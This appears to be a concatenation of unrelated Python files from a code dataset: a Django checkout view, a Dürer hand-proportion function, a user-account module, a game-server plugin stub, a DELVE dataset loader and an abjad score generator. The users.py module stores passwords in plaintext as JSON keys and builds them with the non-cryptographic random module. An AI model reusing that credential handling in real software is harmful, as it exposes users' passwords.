        # # (3) Decrement the stock by one and save
        # book_stock.quantity -= 1
        # book_stock.save()
        #
        # # Payment processing
        # try:
        #     print('決済処理')
        #     # TODO
        #     # raise Exception("決済処理で例外発生")
        # except Exception as e:
        #     # Increment the stock back by one and save
        #     book_stock = get_object_or_404(BookStock, book=book)
        #     book_stock.quantity += 1
        #     book_stock.save()
        #
        #     # Update the order status
        #     order.status = Order.STATUS_PAYMENT_NG
        #     order.save()
        #
        #     messages.error(request, "決済NGです。")
        #     return TemplateResponse(request, 'shop/checkout_error.html')
        #
        # # (4) Update the order status
        # order.status = Order.STATUS_PAYMENT_OK
        # order.save()
        # 3) Wrap the critical section in transaction.atomic()
        # 4) With ATOMIC_REQUESTS enabled, open our own transactions inside this method
        with transaction.atomic():
            # (1) Register the order
            order = Order(
                status=Order.STATUS_PAYMENT_PROCESSING,
                total_amount=book.price,
                ordered_by=request.user,
            )
            order.save()
            # (2) Check the stock quantity
            book_stock = get_object_or_404(BookStock, book=book)
            # (3) Decrement the stock by one and save
            book_stock.quantity -= 1
            book_stock.save()
        # ...(payment processing)...
        print('決済処理')
        with transaction.atomic():
            # (4) Update the order status
            order.status = Order.STATUS_PAYMENT_OK
            order.save()
        messages.info(request, "購入しました。")
        if book_stock.quantity == 0:
            messages.warning(request, "在庫がなくなりました。")
        context = {
            'book': book,
            'book_stock': book_stock,
            'order': order,
        }
        return TemplateResponse(request, 'shop/checkout.html', context)
| [
"akiyoko@users.noreply.github.com"
] | akiyoko@users.noreply.github.com |
0609c2c20e6cddc8222b725733cd1596ab193ac5 | b9e6f1f167556ff55d4f633a829c33f1239c999e | /umano/onehand/durer.py | c07254b854c6b24b1d1b0dfa437cebe3aca40adc | [] | no_license | fondazione-golinelli/u-mano | 50eeabc9ec79a88682b1bad0f3c2bf6dfbd5b656 | b2159a9c1cdf04cf87c018b5edace0f21202c484 | refs/heads/master | 2022-11-26T07:37:37.660356 | 2020-02-19T17:34:50 | 2020-02-19T17:34:50 | 211,079,378 | 0 | 0 | null | 2022-11-22T04:36:16 | 2019-09-26T12:05:19 | Max | UTF-8 | Python | false | false | 3,095 | py | import os
import cv2
from umano.onehand.utils import annotate_frame_with_features
def durerizer(LL):
    """Compute 21 hand landmark points following Durer's proportion study.

    LL is the overall hand length; construction heights are multiples of
    LL/19 (presumably Durer's unit -- the single capital letters C, K, H,
    ... appear to be the height labels from his drawing; TODO confirm
    against the plate).  Returns a list of 21 integer (x, y) points with
    point 0 (the wrist) at the origin, x centered on the middle finger and
    y growing toward the fingertips, grouped thumb / index / middle / ring
    / little with 4 joints per finger.
    """
    # construction heights, all measured in nineteenths of the hand length
    L19 = LL / 19
    C = LL
    K = LL - L19 * 7
    H = LL - L19 * 1.5
    I = LL - L19 * 4
    G = LL - L19 * 1
    N = LL - L19 * 14
    O = LL - L19 * 10
    P = LL - L19 * 6
    L = M = LL - L19 * 11
    # distances between pairs of construction heights
    KN = abs(K - N)
    CP = abs(C - P)
    HL = abs(H - L)
    KG = abs(K - G)
    hand_width = L19 * 11
    middle_finger_width = abs(M - C) / 5
    index_finger_width = middle_finger_width * 4 / 5
    points = [(0.0, 0.0)] * 21
    # thumb
    # point 1 does not exist in Durer's drawing, so interpolate it
    points[2] = (-hand_width / 2 + KN / 4, N)
    points[1] = ((points[0][0] + points[2][0]) * 0.5, (points[0][1] + points[2][1]) * 0.5)
    points[3] = (-hand_width / 2 + KN / 4, O)
    points[4] = (-hand_width / 2, K)
    # index finger
    points[5] = (- middle_finger_width / 2 - index_finger_width / 2, M)
    points[6] = (- middle_finger_width / 2 - index_finger_width / 2, H - HL / 2 * 7 / 7)
    points[7] = (- middle_finger_width / 2 - index_finger_width / 2 * 4 / 5, H - HL / 2 * 3 / 7)
    points[8] = (- middle_finger_width / 2 - index_finger_width / 2 * 4 / 5, H)
    # middle finger (lies on the x = 0 axis)
    points[9] = (0, M)
    points[10] = (0, P)
    points[11] = (0, C - CP * 3 / 7)
    points[12] = (0, C)
    middle_finger_half_height = points[11][1] - points[9][1]
    # ring finger
    # HACK! Durer was not very clear about the ring-finger knuckle, so interpolate
    ring_finger_lower_article = M - (M - (I - middle_finger_half_height)) / 2
    ring_finger_width = abs(G - ring_finger_lower_article) / 5
    points[13] = (middle_finger_width / 2 + ring_finger_width / 2, ring_finger_lower_article)
    points[14] = (middle_finger_width / 2 + ring_finger_width / 2, K)
    points[15] = (middle_finger_width / 2 + ring_finger_width / 2 * 3 / 4, G - KG * 4 / 9)
    points[16] = (middle_finger_width / 2 + ring_finger_width / 2 * 3 / 4, G)
    # little finger
    little_finger_width = middle_finger_half_height / 5
    points[17] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2, I - middle_finger_half_height)
    points[18] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2,
                  I - middle_finger_half_height * 6 / 11)
    points[19] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2 * 3 / 4,
                  I - middle_finger_half_height * 6 / 11 * 6 / 11)
    points[20] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2 * 3 / 4, I)
    # truncate to integer pixel coordinates
    return [(int(x), int(y)) for x, y in points]
if __name__ == "__main__":
    # Demo: overlay the Durer construction on the sample image shipped
    # next to this module.
    img = cv2.imread(os.path.join(os.path.dirname(__file__), "durer_sample.png"))
    # translate points to hand origin in image
    # (image y axis points down, hence origin_y - y)
    origin = (635, 675)
    h = 590 # height in pixel of hand in durer
    points = [(int(x) + int(origin[0]), int(origin[1]) - int(y)) for x, y in durerizer(h)]
    cv2.imshow('durer in the machine (any key to close)', annotate_frame_with_features(img, points=points))
    key = cv2.waitKey(0)
    cv2.destroyAllWindows()
"balasoft.inc@gmail.com"
] | balasoft.inc@gmail.com |
5bd63ee4b6271280ce2d00304ffa469d4f87c56e | cca3447dc39a8437724b90d05e0808e57ab42dba | /users.py | 3b0913f9fedf840e691e5cc21b481155973d1836 | [] | no_license | willseenc/films_prog | 0f181dd6512afc3c9b4c5370ed4fe356a336c26b | 75bc36555b64fd2fc0b1fa5fd70d6cc9ccdbc349 | refs/heads/main | 2023-07-17T21:01:17.168901 | 2021-08-29T18:37:41 | 2021-08-29T18:37:41 | 397,246,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,375 | py | from settings import JSON_PATH_USERS
import random
import string
from exceptions import WrongInfo, check_length
from jsonworker import append_new_data_to_file, read_json_file
class User:
    """A user account stored in the users JSON file (JSON_PATH_USERS).

    NOTE(review): each record is stored as ``{username: True, password: True}``,
    i.e. the credentials are the dictionary *keys* -- confirm this layout is
    intended.
    """
    @check_length
    def special_password(length):
        """Return a random password made of ``length`` ASCII letters."""
        # NOTE(review): not decorated with @staticmethod, so this only works
        # when called through the class (User.special_password(n)), not on an
        # instance.
        password = string.ascii_letters
        random_password = ''.join(random.choice(password) \
            for i in range(int(length)))
        return(random_password)
    @staticmethod
    def registration(user_name, password):
        """Create a new user record and append it to the JSON file."""
        user = User({f'{user_name}' : True, f'{password}' : True})
        User.append_to_json_file(user)
    @staticmethod
    def sign_in(user_name, password):
        """Return a User when a stored record contains both credential keys.

        Raises WrongInfo when no record matches.
        """
        for user_hash in read_json_file(JSON_PATH_USERS):
            try:
                auth_nickname = user_hash[user_name]
                auth_password = user_hash[password]
            # NOTE(review): bare except also hides unrelated errors; catching
            # KeyError would be more precise.
            except:
                continue
            else:
                if auth_nickname and auth_password:
                    return User({user_name : True, password : True})
        raise WrongInfo('Пароль или логин неверен!')
    def __init__(self, user_hash):
        """Split the ``{username: True, password: True}`` mapping into fields."""
        self.username = list(user_hash.keys())[0]
        self.password = list(user_hash.keys())[1]
        self.user_hash = user_hash
    def append_to_json_file(self):
        """Append this user's record to the users JSON file."""
        return append_new_data_to_file(JSON_PATH_USERS, self.user_hash, 0, 0)
| [
"azat1703@gmail.com"
] | azat1703@gmail.com |
c4b7543aef20c0f91e3502dbd9450891de0aa98e | 8c6e9396ae73c41220bb77dfa68dc872f454866e | /multiverse/config/common/groupplugin.py | db8de2c212b0f2351c804990a5a881ca888a0a34 | [] | no_license | jfkfhhfj/LegendaryRealmsMMO | d5d203c89fbd280ff45f2b7e36eb1b1c3c7a3faf | f563432514d121b5d0aed398bed718998257bf6d | refs/heads/master | 2021-01-19T06:20:07.118556 | 2014-02-07T00:27:11 | 2014-02-07T00:39:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,783 | py | #
#
# The Multiverse Platform is made available under the MIT License.
#
# Copyright (c) 2012 The Multiverse Foundation
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#
#
from multiverse.mars import *
from multiverse.mars.core import *
from multiverse.mars.objects import *
from multiverse.mars.util import *
from multiverse.server.math import *
from multiverse.server.events import *
from multiverse.server.objects import *
from multiverse.server.engine import *
from multiverse.server.util import *
from multiverse.server.plugins import *
Log.debug("groupplugin.py: starting")
# Register the group (party) handling plugin class with the engine.
classesPlugin = Engine.registerPlugin("multiverse.mars.plugins.GroupPlugin")
Log.debug("groupplugin.py: done")
| [
"jfkfhhfj@gmail.com"
] | jfkfhhfj@gmail.com |
20e6043502410602386f2cd8c3b9b5696b7035c0 | dd55081656657596667bab4ab4ab4d3a38d1503b | /datasets/delve.py | 2ef78120bb5c2a882a8c528ec141b6dd0899d2fc | [
"BSD-2-Clause"
] | permissive | tkemps/mklaren | 76c5a45220bd86fcf58a05f29cc5e1b116e6a48c | d9e7890aaa26cb3877e1a82114ab1e52df595d96 | refs/heads/master | 2020-04-15T19:04:57.387139 | 2018-11-09T14:27:15 | 2018-11-09T14:27:15 | 164,937,161 | 0 | 0 | NOASSERTION | 2019-01-09T21:00:08 | 2019-01-09T21:00:07 | null | UTF-8 | Python | false | false | 6,617 | py | #encoding="utf-8"
from gzip import open as gzopen
from numpy import loadtxt, zeros, array
from os import environ
from os.path import join, dirname, realpath
DELVE_PATH = join(dirname(realpath(__file__)), "delve")
class Specdict(dict):
    """Mapping from original column indices to matrix column indices.

    Continuous columns are keyed by ``inx`` alone, categorical columns by
    ``(inx, value)`` pairs, and the target column maps to ``TARGET``.
    ``labels`` maps each matrix column index back to a readable name.
    """
    TARGET = "TARGET"

    def __init__(self):
        super(Specdict, self).__init__()
        # number of matrix columns assigned so far
        self.num_vars = 0
        # matrix column index -> column label
        self.labels = {}

    def _register(self, key, label):
        """Assign the next free matrix column to *key* and remember *label*."""
        self[key] = self.num_vars
        self.labels[self.num_vars] = label
        self.num_vars += 1

    def add_variable(self, inx, name, values=None):
        """Add one variable.

        When *values* is given the variable is categorical and one matrix
        column is created per value (indexed by ``(inx, value)``); otherwise
        it is continuous and indexed by ``inx`` alone.
        """
        if values is None:
            self._register(inx, name)
        else:
            for value in values:
                self._register((inx, value), name + "_" + str(value))

    def add_target(self, inx):
        """Mark original column *inx* as the target variable y."""
        self[inx] = self.TARGET
def parse_spec(specfile):
    """
    Parse specification file as a dict.
    :param specfile
        Path to the .spec file.
    :return
        Specdict mapping original index -> matrix index.
    """
    sd = Specdict()
    # The original column index counts *every* line of the file, comment
    # lines included -- this matches the layout of delve .spec files.
    inx = 0
    # 'with' guarantees the file is closed (the previous version leaked
    # the handle).
    with open(specfile, "r") as fp:
        for line in fp:
            if not line.startswith("#"):
                ls = line.strip().split()
                name = ls[1]
                typ = ls[2]
                # If type is categorical, the value range is stored in the
                # next column; all categorical values are strings.
                if typ == "c":
                    rng = ls[3]
                    if ".." in rng:
                        # numeric range, e.g. "1..5"
                        start, end = map(int, rng.split(".."))
                        values = range(start, end + 1)
                        values = map(str, values)
                    elif "," in rng:
                        # explicit value list, e.g. "M,F,I"
                        values = rng.split(",")
                    sd.add_variable(inx=inx, name=name, values=values)
                elif typ == "u":
                    # continuous (unbounded) variable
                    sd.add_variable(inx=inx, name=name)
                elif typ == "y":
                    # target variable
                    sd.add_target(inx)
                else:
                    pass
            inx += 1
    return sd
def load_delve(dataset_path, dataset_spec, n=None):
    """
    Load an delve dataset. Specification is given by the spec file.
    :param dataset_path
        Path to the .data.gz file.
    :param dataset_spec
        Path to the .spec file.
    :param n
        If defined, read only first n rows.
    :return
        Dictionary with keys "data", "target", "labels".
    """
    rdict = dict()
    sd = parse_spec(dataset_spec)
    count = 0
    X = list()
    y = list()
    # 'with' guarantees the gzip handle is closed even when parsing fails
    # (the previous version leaked the handle).
    with gzopen(dataset_path, "r") as fp:
        # NOTE(review): gzopen(..., "r") yields *bytes* on Python 3, so
        # str(fp.readline()) produces "b'...'" wrapper strings; this reading
        # logic looks Python-2 oriented -- confirm before running under 3.
        line = str(fp.readline())
        while line:
            if line.count('\\'):
                # Must read another line (backslash marks a continuation)
                line = line.strip().replace("\\", "") + str(fp.readline())
            x = zeros((sd.num_vars, ))
            for i, v in enumerate(line.strip().split()):
                if i in sd:
                    if sd[i] == sd.TARGET:
                        y.append(float(v))
                    else:
                        # continuous variable: copy the value
                        j = sd[i]
                        x[j] = float(v)
                elif (i, v) in sd:
                    # categorical variable: one-hot encode
                    j = sd[i, v]
                    x[j] = 1
                else:
                    pass
            X.append(x)
            line = str(fp.readline())
            count += 1
            if n is not None and count == n:
                break
    rdict["data"] = array(X)
    rdict["target"] = array(y)
    rdict["labels"] = [sd.labels[i] for i in range(len(X[0]))]
    return rdict
# Convenience wrappers: each loads one delve dataset bundled under
# DELVE_PATH; *n* limits the number of rows read, *typ* (where present)
# selects the 8/32-dimensional "fairly/nonlinear, high/medium noise"
# variant, e.g. "8fh".
def load_abalone(n=None):
    return load_delve(dataset_path=join(DELVE_PATH, "abalone", "Dataset.data.gz"),
                      dataset_spec=join(DELVE_PATH, "abalone", "Dataset.spec"),
                      n = n)
def load_boston(n=None):
    return load_delve(dataset_path=join(DELVE_PATH, "boston", "Dataset.data.gz"),
                      dataset_spec=join(DELVE_PATH, "boston", "Dataset.spec"),
                      n = n)
def load_census_house(n=None):
    return load_delve(dataset_path=join(DELVE_PATH, "census-house", "Dataset.data.gz"),
                      dataset_spec=join(DELVE_PATH, "census-house", "Dataset.spec"),
                      n = n)
def load_comp_activ(n=None):
    return load_delve(dataset_path=join(DELVE_PATH, "comp-activ", "Dataset.data.gz"),
                      dataset_spec=join(DELVE_PATH, "comp-activ", "Dataset.spec"),
                      n = n)
def load_bank(typ="8fh", n=None):
    return load_delve(dataset_path=join(DELVE_PATH, "bank", "bank-%s" % typ, "Dataset.data.gz"),
                      dataset_spec=join(DELVE_PATH, "bank", "bank-%s" % typ, "Dataset.spec"),
                      n = n)
def load_pumadyn(typ="8fh", n=None):
    return load_delve(dataset_path=join(DELVE_PATH, "pumadyn", "pumadyn-%s" % typ, "Dataset.data.gz"),
                      dataset_spec=join(DELVE_PATH, "pumadyn", "pumadyn-%s" % typ, "Dataset.spec"),
                      n = n)
def load_kin(typ="8fh", n=None):
    return load_delve(dataset_path=join(DELVE_PATH, "kin", "kin-%s" % typ, "Dataset.data.gz"),
                      dataset_spec=join(DELVE_PATH, "kin", "kin-%s" % typ, "Dataset.spec"),
                      n = n)
if __name__ == "__main__":
    # Smoke test: load every bundled dataset and check that data and
    # target are non-trivial.
    for load in [
        load_abalone,
        load_census_house,
        load_comp_activ,
        load_boston,
    ]:
        data = load()
        X = data["data"]
        y = data["target"]
        labels = data["labels"]
        print(X.shape, y.shape)
        print(labels)
        assert X.sum() != 0
        assert y.sum() != 0
        # BUGFIX: this was a bare ``print`` (a no-op expression in Python 3);
        # call it so the separating blank line is actually printed, matching
        # the print() in the loop below.
        print()
    # Datasets with 8/32-dimensional "fh/fm/nh/nm" variants.
    for load in [
        load_bank,
        load_pumadyn,
        load_kin,
    ]:
        for num in "8", "32":
            for t in ["fh", "fm", "nh", "nm"]:
                typ = "%s%s" % (num, t)
                data = load(typ=typ)
                X = data["data"]
                y = data["target"]
                labels = data["labels"]
                print(load, X.shape, y.shape)
                assert X.sum() != 0
                assert y.sum() != 0
                print()
| [
"martin.strazar@gmail.com"
] | martin.strazar@gmail.com |
ad98a84cb7b5beefed9cb530b9b8658d50e74def | e798ba63a2be30dd98a544af906cfbb31cf6e225 | /Test/subtest/Test.py | 69556b393dbc4c143c3b1ddae34d9559b92126d4 | [] | no_license | ivanalexandermoscotta/guerrero | 5f5c25150ca00ec3b665423027e3b605a8e89c56 | 7c4a493c99d7b692d66e43e9cd4b141041d4474c | refs/heads/master | 2020-03-28T11:01:04.910466 | 2018-09-20T19:09:35 | 2018-09-20T19:09:35 | 148,169,122 | 1 | 0 | null | 2018-09-20T19:09:36 | 2018-09-10T14:35:13 | LilyPond | UTF-8 | Python | false | false | 30,139 | py | import abjad
import itertools
import os
import pathlib
import time
import abjadext.rmakers
from MusicMaker import MusicMaker
from AttachmentHandler import AttachmentHandler
print('Interpreting file ...')
# Define the time signatures we would like to apply against the timespan structure.
time_signatures = [
    abjad.TimeSignature(pair) for pair in [
        (5, 4), (4, 4), (3, 4), (5, 4), (4, 4), (3, 4),
        (3, 4), (4, 4), (5, 4), (3, 4), (4, 4), (5, 4),
    ]
]
# Cumulative sums of the measure durations: the offsets of the barlines,
# usable later for splitting timespans at measure boundaries.
bounds = abjad.mathtools.cumulative_sums([_.duration for _ in time_signatures])
# Define rhythm-makers: two to be used by the MusicMaker, one for silence.
# Both talea makers beam divisions together, prepend rests via the burnish
# specifier, and simplify trivial/rest-filled tuplets.
rmaker_001 = abjadext.rmakers.TaleaRhythmMaker(
    talea=abjadext.rmakers.Talea(
        counts=[1, 1, 1, 5, 3, 2, 4],
        denominator=16,
    ),
    beam_specifier=abjadext.rmakers.BeamSpecifier(
        beam_divisions_together=True,
        beam_rests=False,
    ),
    extra_counts_per_division=[0, 1, ],
    burnish_specifier=abjadext.rmakers.BurnishSpecifier(
        left_classes=[abjad.Rest],
        left_counts=[1, 0, 1],
    ),
    tuplet_specifier=abjadext.rmakers.TupletSpecifier(
        trivialize=True,
        extract_trivial=True,
        rewrite_rest_filled=True,
    ),
)
rmaker_002 = abjadext.rmakers.TaleaRhythmMaker(
    talea=abjadext.rmakers.Talea(
        counts=[4, 3, -1, 2],
        denominator=8,
    ),
    beam_specifier=abjadext.rmakers.BeamSpecifier(
        beam_divisions_together=True,
        beam_rests=False,
    ),
    extra_counts_per_division=[-1, 0,],
    burnish_specifier=abjadext.rmakers.BurnishSpecifier(
        left_classes=[abjad.Rest],
        left_counts=[1, 0, 1],
    ),
    tuplet_specifier=abjadext.rmakers.TupletSpecifier(
        trivialize=True,
        extract_trivial=True,
        rewrite_rest_filled=True,
    ),
)
# Shared dynamics/articulation handler applied by both MusicMakers.
attachment_handler = AttachmentHandler(
    starting_dynamic='mf',
    ending_dynamic='ff',
    trend='o<',
    articulation='staccato'
)
# Initialize two MusicMakers with the rhythm-makers.
rmaker_one = MusicMaker(
    rmaker=rmaker_001,
    pitches=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
    continuous=True,
    attachment_handler=attachment_handler,
)
rmaker_two = MusicMaker(
    rmaker=rmaker_002,
    continuous=True,
    attachment_handler=attachment_handler,
)
# Note maker that silences every division; used for gaps in the structure.
silence_maker = abjadext.rmakers.NoteRhythmMaker(
    division_masks=[
        abjadext.rmakers.SilenceMask(
            pattern=abjad.index([0], 1),
        ),
    ],
)
# Define a small class so that we can annotate timespans with additional
# information:
class MusicSpecifier:
    """Annotation payload pairing a rhythm-maker with its target voice.

    Instances are attached to AnnotatedTimespans so that, after the timespan
    structure is split, each timespan still knows which voice it belongs to
    and which rhythm-maker should realize it.
    """

    def __init__(self, rhythm_maker, voice_name):
        self.rhythm_maker = rhythm_maker  # rhythm-maker realizing the timespan
        self.voice_name = voice_name      # e.g. 'Voice 1'

    def __repr__(self):
        # added for debuggability when inspecting annotated timespan lists
        return '{}(rhythm_maker={!r}, voice_name={!r})'.format(
            type(self).__name__, self.rhythm_maker, self.voice_name)
# Define an initial timespan structure, annotated with music specifiers. This
# structure has not been split along meter boundaries. This structure does not
# contain timespans explicitly representing silence.
print('Collecting timespans and rmakers ...')
def _make_voice_timespan_list(voice_name, triples):
    """Return a TimespanList of AnnotatedTimespans for one voice.

    *triples* is a sequence of ``(start_offset, stop_offset, rhythm_maker)``
    entries; each becomes an AnnotatedTimespan whose MusicSpecifier annotation
    records both the rhythm-maker and the destination voice name, so the
    association survives later splitting/merging operations.
    """
    return abjad.TimespanList([
        abjad.AnnotatedTimespan(
            start_offset=start_offset,
            stop_offset=stop_offset,
            annotation=MusicSpecifier(
                rhythm_maker=rhythm_maker,
                voice_name=voice_name,
            ),
        )
        for start_offset, stop_offset, rhythm_maker in triples
    ])

# The sixteen voices fall into four groups -- voices 1/5/9/13, 2/6/10/14,
# 3/7/11/15 and 4/8/12/16 -- each group sharing identical timespan data, so
# the data is stated once per group instead of once per voice.
_group_a_triples = [
    [(0, 4), (3, 4), rmaker_one],
    [(5, 4), (8, 4), rmaker_one],
    [(12, 4), (15, 4), rmaker_two],
    [(17, 4), (20, 4), rmaker_one],
    [(28, 4), (31, 4), rmaker_two],
    [(33, 4), (36, 4), rmaker_two],
    [(40, 4), (43, 4), rmaker_one],
    [(45, 4), (48, 4), rmaker_two],
]
_group_b_triples = [
    # The (4,4)-(7,4), (16,4)-(19,4), (29,4)-(32,4) and (41,4)-(44,4) spans
    # were each deliberately split in two in the original data.
    [(4, 4), (5, 4), rmaker_two],
    [(5, 4), (7, 4), rmaker_two],
    [(9, 4), (12, 4), rmaker_one],
    [(16, 4), (17, 4), rmaker_two],
    [(17, 4), (19, 4), rmaker_two],
    [(21, 4), (24, 4), rmaker_one],
    [(24, 4), (27, 4), rmaker_one],
    [(29, 4), (31, 4), rmaker_two],
    [(31, 4), (32, 4), rmaker_two],
    [(36, 4), (39, 4), rmaker_one],
    [(41, 4), (43, 4), rmaker_two],
    [(43, 4), (44, 4), rmaker_two],
]
_group_c_triples = [
    [(2, 4), (5, 4), rmaker_one],
    [(9, 4), (12, 4), rmaker_two],
    [(14, 4), (17, 4), rmaker_two],
    [(21, 4), (24, 4), rmaker_one],
    [(24, 4), (27, 4), rmaker_two],
    [(31, 4), (34, 4), rmaker_one],
    [(36, 4), (39, 4), rmaker_one],
    [(43, 4), (46, 4), rmaker_two],
]
_group_d_triples = [
    # The (7,4)-(10,4), (19,4)-(22,4), (26,4)-(29,4) and (38,4)-(41,4) spans
    # were each deliberately split in two in the original data.
    [(0, 4), (3, 4), rmaker_two],
    [(7, 4), (9, 4), rmaker_two],
    [(9, 4), (10, 4), rmaker_two],
    [(12, 4), (15, 4), rmaker_one],
    [(19, 4), (21, 4), rmaker_two],
    [(21, 4), (22, 4), rmaker_two],
    [(26, 4), (27, 4), rmaker_one],
    [(27, 4), (29, 4), rmaker_one],
    [(33, 4), (36, 4), rmaker_one],
    [(38, 4), (39, 4), rmaker_two],
    [(39, 4), (41, 4), rmaker_two],
    [(45, 4), (48, 4), rmaker_one],
]
voice_1_timespan_list = _make_voice_timespan_list('Voice 1', _group_a_triples)
voice_5_timespan_list = _make_voice_timespan_list('Voice 5', _group_a_triples)
voice_9_timespan_list = _make_voice_timespan_list('Voice 9', _group_a_triples)
voice_13_timespan_list = _make_voice_timespan_list('Voice 13', _group_a_triples)
voice_2_timespan_list = _make_voice_timespan_list('Voice 2', _group_b_triples)
voice_6_timespan_list = _make_voice_timespan_list('Voice 6', _group_b_triples)
voice_10_timespan_list = _make_voice_timespan_list('Voice 10', _group_b_triples)
voice_14_timespan_list = _make_voice_timespan_list('Voice 14', _group_b_triples)
voice_3_timespan_list = _make_voice_timespan_list('Voice 3', _group_c_triples)
voice_7_timespan_list = _make_voice_timespan_list('Voice 7', _group_c_triples)
voice_11_timespan_list = _make_voice_timespan_list('Voice 11', _group_c_triples)
voice_15_timespan_list = _make_voice_timespan_list('Voice 15', _group_c_triples)
voice_4_timespan_list = _make_voice_timespan_list('Voice 4', _group_d_triples)
voice_8_timespan_list = _make_voice_timespan_list('Voice 8', _group_d_triples)
voice_12_timespan_list = _make_voice_timespan_list('Voice 12', _group_d_triples)
voice_16_timespan_list = _make_voice_timespan_list('Voice 16', _group_d_triples)
# Create a dictionary mapping voice names to timespan lists so we can
# maintain the association in later operations:
all_timespan_lists = {
    'Voice 1': voice_1_timespan_list,
    'Voice 2': voice_2_timespan_list,
    'Voice 3': voice_3_timespan_list,
    'Voice 4': voice_4_timespan_list,
    'Voice 5': voice_5_timespan_list,
    'Voice 6': voice_6_timespan_list,
    'Voice 7': voice_7_timespan_list,
    'Voice 8': voice_8_timespan_list,
    'Voice 9': voice_9_timespan_list,
    'Voice 10': voice_10_timespan_list,
    'Voice 11': voice_11_timespan_list,
    'Voice 12': voice_12_timespan_list,
    'Voice 13': voice_13_timespan_list,
    'Voice 14': voice_14_timespan_list,
    'Voice 15': voice_15_timespan_list,
    'Voice 16': voice_16_timespan_list,
}
# Determine the "global" timespan of all voices combined:
global_timespan = abjad.Timespan(
    start_offset=0,
    stop_offset=max(_.stop_offset for _ in all_timespan_lists.values())
)
# Using the global timespan, create silence timespans for each timespan list.
# We don't need to create any silences by-hand if we know the global start and
# stop offsets of all voices combined:
for voice_name, timespan_list in all_timespan_lists.items():
    # Here is another technique for finding where the silence timespans are. We
    # create a new timespan list consisting of the global timespan and all the
    # timespans from our current per-voice timespan list. Then we compute an
    # in-place logical XOR. The XOR will replace the contents of the "silences"
    # timespan list with a set of timespans representing those periods of time
    # where only one timespan from the original was present. This has the
    # effect of cutting out holes from the global timespan wherever a per-voice
    # timespan was found, but also preserves any silence before the first
    # per-voice timespan or after the last per-voice timespan. Then we merge
    # the newly-created silences back into the per-voice timespan list.
    silences = abjad.TimespanList([global_timespan])
    silences.extend(timespan_list)
    silences.sort()
    silences.compute_logical_xor()
    # Add the silences into the voice timespan list. We create new *annotated*
    # timespans so we can maintain the voice name information.  A silence is
    # marked by ``rhythm_maker=None``; key_function below maps that to the
    # silence maker.
    for silence_timespan in silences:
        timespan_list.append(
            abjad.AnnotatedTimespan(
                start_offset=silence_timespan.start_offset,
                stop_offset=silence_timespan.stop_offset,
                annotation=MusicSpecifier(
                    rhythm_maker=None,
                    voice_name=voice_name,
                ),
            )
        )
    timespan_list.sort()
# Split the timespan list via the time signatures and collect the shards into a
# new timespan list
for voice_name, timespan_list in all_timespan_lists.items():
    shards = timespan_list.split_at_offsets(bounds)
    split_timespan_list = abjad.TimespanList()
    for shard in shards:
        split_timespan_list.extend(shard)
    split_timespan_list.sort()
    # We can replace the original timespan list in the dictionary of
    # timespan lists because we know the key it was stored at (its voice
    # name).  Bug fix: the original code stored the *unsplit* list here
    # (``timespan_list``), silently discarding the split results computed
    # just above.
    all_timespan_lists[voice_name] = split_timespan_list
# Create a score structure: a hidden context for skips/time signatures plus a
# staff group holding one staff (each wrapping one named voice) per player.
# The sixteen identical staves are generated instead of written out by hand.
score = abjad.Score([
    abjad.Staff(lilypond_type='TimeSignatureContext', name='Global Context'),
    abjad.StaffGroup(
        [
            abjad.Staff(
                [abjad.Voice(name=f'Voice {number}')],
                name=f'Staff {number}',
                lilypond_type='Staff',
            )
            for number in range(1, 17)
        ],
        name='Staff Group',
    )
])
# Teach each of the staves how to draw analysis brackets
for staff in score['Staff Group']:
    staff.consists_commands.append('Horizontal_bracket_engraver')
# Add skips and time signatures to the global context
for time_signature in time_signatures:
    skip = abjad.Skip(1)
    # NOTE(review): attaching a Multiplier built from the time signature
    # presumably scales the whole-note skip to the measure length; newer
    # abjad versions take multiplier= at construction -- confirm against the
    # abjad version in use.
    abjad.attach(abjad.Multiplier(time_signature), skip)
    abjad.attach(time_signature, skip)
    score['Global Context'].append(skip)
# Define a helper function that takes a rhythm maker and some durations and
# outputs a container.  (A disabled LilyPond analysis-bracket decoration
# previously lived here as commented-out code; it has been removed as dead
# code -- the surrounding comments no longer claimed anything it did not do.)
print('Making containers ...')
def make_container(rhythm_maker, durations):
    """Run *rhythm_maker* over *durations* and return the music in a Container.

    *rhythm_maker* is any callable mapping a list of durations to selections
    (a rhythm-maker or one of the MusicMaker wrappers above).
    """
    selections = rhythm_maker(durations)
    container = abjad.Container([])
    container.extend(selections)
    return container
# Loop over the timespan list dictionaries, spitting out pairs of voice
# names and per-voice timespan lists. Group timespans into phrases, with
# all timespans in each phrase having an identical rhythm maker. Run the
# rhythm maker against the durations of the timespans in the phrase and
# add the output to the voice with the timespan lists's voice name.
def key_function(timespan):
    """
    Grouping key for itertools.groupby: the timespan's rhythm-maker.

    Timespans annotated with no rhythm-maker represent silence and are
    keyed to the module-level silence maker instead.
    """
    maker = timespan.annotation.rhythm_maker
    return maker if maker else silence_maker
# Render each voice: group its timespans into phrases of identical
# rhythm-maker and append one container per phrase to the voice.
for voice_name, timespan_list in all_timespan_lists.items():
    # groupby only merges *adjacent* equal keys, so each contiguous run of
    # timespans sharing a rhythm-maker becomes one phrase.
